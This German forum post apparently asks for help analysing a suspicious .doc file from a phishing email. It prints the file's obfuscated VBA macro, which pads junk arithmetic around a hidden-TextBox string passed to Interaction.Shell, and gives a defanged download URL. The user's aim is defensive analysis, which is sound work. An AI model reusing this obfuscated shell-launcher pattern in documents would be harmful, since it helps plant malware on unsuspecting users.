![[HaBo]](/styles/default/logoklein.png)
Hallo!
Meine Freundin hat eine höchstwarscheinlich schädliche .doc Datei auf ihrem Android Telefon geöffnet. Sie bekam zwar die Meldung, dass die Datei nicht kompatibel sei, aber wir wissen ja alle, dass die Viren selbst gerne solche Meldungen ausgeben um in Ruhe ihren Dienst machen zu können.
Ich hab selbst versucht die Datei zu analysieren um rauszufinden ob sie nur auf Windows abzielt oder auch auf Android funktioniert, aber mangels Windows und Word konnte ich nicht viel machen. In LibreOffice unter Linux zumindest.
Das hier ist der VBA Macro Code der in der Datei war. Er scheint einen ShellBefehl zu konstruieren. Dafür scheint er " lMLQNCW.TextBox1.Text" zu nutzen, was aber bei mir nicht existiert.
Vielleicht hat jemand von euch die nötigen Tools um die Frage zu beantworten (Welches Zielsystem hier infiziert werden soll). Die Email lässt einen die Datei runterladen in dem sie auf diese Adresse verweist:
http:// www. maquisagdl .com/ AMAZON/Transaction_details/ 122018
Die Leerzeichen sind von mir damit niemand versehntlich drauf klickt.
Ich habe zusätzlich die originale Doc datei angehängt.
NICHT OHNE VORKEHRUNGEN ÖFFNEN!
Editiert von CDW: [FONT/SIZE] durch Code-Tags ersetzt.
Meine Freundin hat eine höchstwarscheinlich schädliche .doc Datei auf ihrem Android Telefon geöffnet. Sie bekam zwar die Meldung, dass die Datei nicht kompatibel sei, aber wir wissen ja alle, dass die Viren selbst gerne solche Meldungen ausgeben um in Ruhe ihren Dienst machen zu können.
Ich hab selbst versucht die Datei zu analysieren um rauszufinden ob sie nur auf Windows abzielt oder auch auf Android funktioniert, aber mangels Windows und Word konnte ich nicht viel machen. In LibreOffice unter Linux zumindest.
Das hier ist der VBA Macro Code der in der Datei war. Er scheint einen ShellBefehl zu konstruieren. Dafür scheint er " lMLQNCW.TextBox1.Text" zu nutzen, was aber bei mir nicht existiert.
Code:
Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Function WjBqwh()
On Error Resume Next
QELhhdllDQwwafEnnK = qHNctTqtDCFRDoCOHHa * Rnd(218257442 / Sin(mdAFYZMtvdFKnQNDcRNq)) / Wfd + Int(235660589 - Rnd(222783936 - Tan(230775837) * 330087000 - Cos(sKYQzjNdwEiMWVudzIZzHQXo)) / 76401718 * Sin(202975854 / Tan(275381003) / 81406682 / Hex(279258555))) + 306369454 + CStr(32602227) - 305587333 / CLng(17764711) * 42514468 - Fix(207436734 - Hex(96159200) * 267186772 / ChrW(zzsjrLiqFvTMkZJwrcmj / 29678743))
qAmBzkKQqfpVKbGaY = 78970074 - VZusdKfkDPDbFZi
aoSjnSiNdjUbVuJHCDvCzuBn = HGvJivlGIOwWVR * Rnd(192440140 / Sin(phPfZGvbDhhCqBfmihjLm)) / Wfd + Int(23142671 - Rnd(337577446 - Tan(262882768) * 229721646 - Cos(MjMlhlSUIMmIcALTGz)) / 93348129 * Sin(228896818 / Tan(103077290) / 44906081 / Hex(229373156))) + 66551324 + CStr(288078810) - 264284961 / CLng(245936704) * 113444674 - Fix(314730000 - Hex(247073808) * 227228470 / ChrW(wEuOPSAvjWtSAWEfATw / 14896410))
AFFzCttABYWiKLYGwEo = 320995647 - wtNQJVjFQcojCwwoR
MNjauvmvjTAzAzCoqhwG = YXsPjkRCFYOGOYi * Rnd(12727917 / Sin(NTnXvYPrXSsBlmNzZn)) / Wfd + Int(276854860 - Rnd(261665763 - Tan(71132648) * 71957350 - Cos(UsiulrlZTmSUdSjd)) / 334269227 * Sin(187815549 / Tan(158790559) / 84679086 / Hex(119169395))) + 160259321 + CStr(8124639) - 130496318 / CLng(252635309) * 7090608 - Fix(59268377 - Hex(271092695) * 245493374 / ChrW(OMCISiRdiAltZOSSkipKrLm / 329620619))
wrKIkiwnaYGRUAFLVwYbYwm = 6132363 - QizbBCZEQWmGVtRoFw
iwYhzjZNrtZTjnMA = tVHIjBzHVUSDhjufV * Rnd(205103055 / Sin(FlHTftvZbdHjoAz)) / Wfd + Int(237510183 - Rnd(62279903 - Tan(224863163) * 20869381 - Cos(ubacMGKKKioLIEvflCcOocVd)) / 87119918 * Sin(267295966 / Tan(198414477) / 21956852 / Hex(222791749))) + 337668664 + CStr(241735669) - 326068115 / CLng(118326103) * 215057817 - Fix(82788749 - Hex(194459262) * 69465971 / ChrW(HYjkPwpwXkETwHFoKSFw / 98579452))
cGcKuqtbsRVGvEfDNZ = 265165550 - QtwOAdsdWuXNQjvcH
Const CUNJhSs = 0
ulAorusrCAsFJvITlmjvwBw = uoICCXhviDOloYd * Rnd(50909732 / Sin(YFQzPGtimjrjYtsntt)) / Wfd + Int(16550458 - Rnd(245272430 - Tan(280112100) * 271307456 - Cos(TwWFhXiNIZcawhHihPTQ)) / 287883988 * Sin(280866247 / Tan(101493808) / 67568455 / Hex(64589345))) + 149358989 + CStr(330239711) - 309990258 / CLng(203459855) * 176050045 - Fix(147979656 - Hex(190681017) * 232265463 / ChrW(zCtAMLHSiHwTvFlPUVX / 165955313))
chMwKZjiiCzrWkFkhDHIYI = 53906237 - qbsJPGBFKmVVhEBl
wSFzRXDDvoGzaKPtjaLVh = jIzhJSDnMNmUdjQmWkANSOR * Rnd(208539145 / Sin(ITvNzpbCHmwAkOlz)) / Wfd + Int(49417554 - Rnd(186440087 - Tan(293649445) * 68876540 - Cos(jfdtDaUTYSrRWAw)) / 52754391 * Sin(175295301 / Tan(94487460) / 155962183 / Hex(73317179))) + 118653776 + CStr(149830567) - 326382034 / CLng(131566055) * 248834535 - Fix(245810259 - Hex(145482145) * 101110807 / ChrW(LlYVEboSTtPGiiTEj / 97499783))
mrjNUzoKiJISEFFN = 214469820 - wRZKpHUIEjodPCWIc
VEirbKvBOGfPXvliWMufYUdA = rwBNRpWbdMiiXzrMD * Rnd(120296714 / Sin(NhfKiMGEiobAbdbjLunzQI)) / Wfd + Int(259222539 - Rnd(307154768 - Tan(227605592) * 47401656 - Cos(zMDSVCnmhLnSAKlrnBMCAwPf)) / 122692381 * Sin(99733002 / Tan(137601335) / 165561213 / Hex(33447529))) + 306785364 + CStr(243485294) - 186648843 / CLng(180456120) * 82924821 - Fix(48005392 - Hex(285328965) * 181245912 / ChrW(GzortYXbmmfRAsWEzC / 324123770))
AGhOhnaLroDtQRvOOIC = 283641022 - rcitnusFWNEuDVz
AANGhnInEuLYiZ = khidpsGPUzWtnjiAbTLVQ * Rnd(283877204 / Sin(fbwcSqaQGbdQKVif)) / Wfd + Int(61499812 - Rnd(300181566 - Tan(244112485) * 295568457 - Cos(LuUGatkEWDQtYCB)) / 281503183 * Sin(103488117 / Tan(265586930) / 163435285 / Hex(303033039))) + 216568417 + CStr(109918763) - 115721025 / CLng(68251957) * 106899782 - Fix(133149332 - Hex(203063355) * 290282910 / ChrW(CcfwAUhdVrwqMjYMXmThot / 34594637))
wcucKqGOsPUbkuXh = 132141711 - twbDUhtzsiLLAIXT
YwZIOiEQMWGiMfQiEs = hQiwhlwqolvmqhEi * Rnd(232268745 / Sin(CpirhusmfwOpoNEMjCtzrX)) / Wfd + Int(116759404 - Rnd(289778562 - Tan(102113651) * 208980440 - Cos(jQBHAjtBCbpikGuFw)) / 189338359 * Sin(335150505 / Tan(322960503) / 227207145 / Hex(226253815))) + 198082881 + CStr(327702372) - 13090509 / CLng(241423699) * 233601408 - Fix(324585161 - Hex(205039316) * 158004161 / ChrW(bBdIViqNIuLBktUJtwRTPQ / 228362292))
BmDGPzwWikOjGzZbHPpCW = 217460831 - EhbpANEbLTvGjakzLwoWzfn
iZkAlRSjmh = lMLQNCW.TextBox1.Text + pMAajL + zYoHvIaJ + LrpAWR + cYsbknjl + hKtZu + MIDCjwp + rEippi + iiSabFz + dKzZdQN + IaCBO
DjkwiwUjSdDaiKwjZMqQjLq = LrSNuCnuvbCJTJEimGZbXGw * Rnd(296387697 / Sin(nuXUPOstqlmdHoPqIfHImQPH)) / Wfd + Int(76443279 - Rnd(198638428 - Tan(172162097) * 245595470 - Cos(WEsZPGIPafNJQdYRB)) / 205663596 * Sin(117932704 / Tan(65057784) / 241561022 / Hex(99906270))) + 179157535 + CStr(286931334) - 242443203 / CLng(75466421) * 154982183 - Fix(204734772 - Hex(105009965) * 58031440 / ChrW(nHiTjuEriHbiAtwVmqqKw / 54229393))
iHdBpEjdzRtZCmJsWwn = 234735086 - JjazmploZwmffz
TGAwoWQrMSWSSmifvZbIT = tiRijvVZsEJlFVvw * Rnd(260186666 / Sin(TjMiIWLbpzNzzHRJMSiKm)) / Wfd + Int(136269281 - Rnd(145401172 - Tan(253515844) * 171546328 - Cos(JhhJkwmppnzKZuSIF)) / 155575276 * Sin(79075487 / Tan(312510318) / 33083356 / Hex(11278401))) + 133815661 + CStr(311411630) - 54645389 / CLng(194453348) * 131886384 - Fix(191901393 - Hex(335022788) * 333660634 / ChrW(aIqNiujNRLKSdMCs / 237866449))
iPwaiNHNmBGcJqqdWBjhnNZ = 68871794 - kujqiFljlUjLzidFRHfGoCT
jmkKWrqhTFiSTZVZcrzcmD = TsiPswrztJqMYriCfSSKzT * Rnd(193251211 / Sin(YVtBimmzdzQRnbz)) / Wfd + Int(227129405 - Rnd(181822925 - Tan(55645843) * 270032570 - Cos(cNzhzoTKUspAPbq)) / 150300507 * Sin(31937695 / Tan(278367526) / 99933563 / Hex(47404362))) + 153128609 + CStr(280418389) - 230060504 / CLng(179984018) * 179522678 - Fix(86702488 - Hex(99925336) * 25233572 / ChrW(jiriUiLYMDtScfkHQC / 81032105))
bdlthlmiWGkZPplKwVuwf = 332179531 - mVovLwUKKCStFzwwisjCGTU
GimApMZBqBzAbZw = JqfMoCnKiaMHpwUifmPI * Rnd(74870586 / Sin(nVZjhfTTBQKdjOEOSEqcSP)) / Wfd + Int(341420379 - Rnd(115099728 - Tan(77298909) * 284260734 - Cos(OUpJnTUCJmFUHqOZvzMS)) / 39832317 * Sin(197104229 / Tan(107937501) / 126942418 / Hex(75427665))) + 120083531 + CStr(232527999) - 145029491 / CLng(161339685) * 143635742 - Fix(55917303 - Hex(153934586) * 277020697 / ChrW(EwMGWJLMucNjilDpETzYakEV / 330807046))
kwiodhiImPNobCGtin = 35418431 - jwSiRoXRYUuqIBZNiGw
taIuHPFc = Array(wXtqajBv, WzwfMAY, DwwlSB, Interaction.Shell(iZkAlRSjmh, CUNJhSs), IRXLQDnN)
vUijrrEMwpqHPooiAi = ZvohXfBiODonUUKYcpowzBuf * Rnd(65935101 / Sin(YUUQLnRCEZHmLDpMpJIBWn)) / Wfd + Int(30899081 - Rnd(104334139 - Tan(78779130) * 298746756 - Cos(fzYBJXhGhKzrAVSQ)) / 249363046 * Sin(114155408 / Tan(276176489) / 195320005 / Hex(246319407))) + 58329329 + CStr(237508105) - 75409916 / CLng(247334148) * 153752668 - Fix(55522399 - Hex(128775422) * 248437990 / ChrW(EEScmCjXwOiwICsRH / 208735859))
WSwWPaWPMPlPOV = 113996934 - sZYjPkNTbzozhTU
TDJDuIbGkUSEuKJsKjYN = KDziAaZJkZHRcOEzml * Rnd(85516949 / Sin(dupvVaKdFkuAqJI)) / Wfd + Int(4833431 - Rnd(63351060 - Tan(140682744) * 299961388 - Cos(BzzvLmRvEsXvLFrPNEMZQ)) / 320157477 * Sin(20923602 / Tan(3148) / 202692957 / Hex(43061925))) + 182206300 + CStr(126124123) - 39555855 / CLng(27275445) * 273730558 - Fix(112990862 - Hex(286560788) * 201943856 / ChrW(jvukiIOYNNzpkRt / 260750458))
ITSEtzREKwpADGD = 215148930 - LUTUdQBXqmfRrBMQkIXMBmvc
End FunctionVielleicht hat jemand von euch die nötigen Tools um die Frage zu beantworten (Welches Zielsystem hier infiziert werden soll). Die Email lässt einen die Datei runterladen in dem sie auf diese Adresse verweist:
http:// www. maquisagdl .com/ AMAZON/Transaction_details/ 122018
Die Leerzeichen sind von mir damit niemand versehntlich drauf klickt.
Ich habe zusätzlich die originale Doc datei angehängt.
NICHT OHNE VORKEHRUNGEN ÖFFNEN!
Editiert von CDW: [FONT/SIZE] durch Code-Tags ersetzt.
Zuletzt bearbeitet von einem Moderator: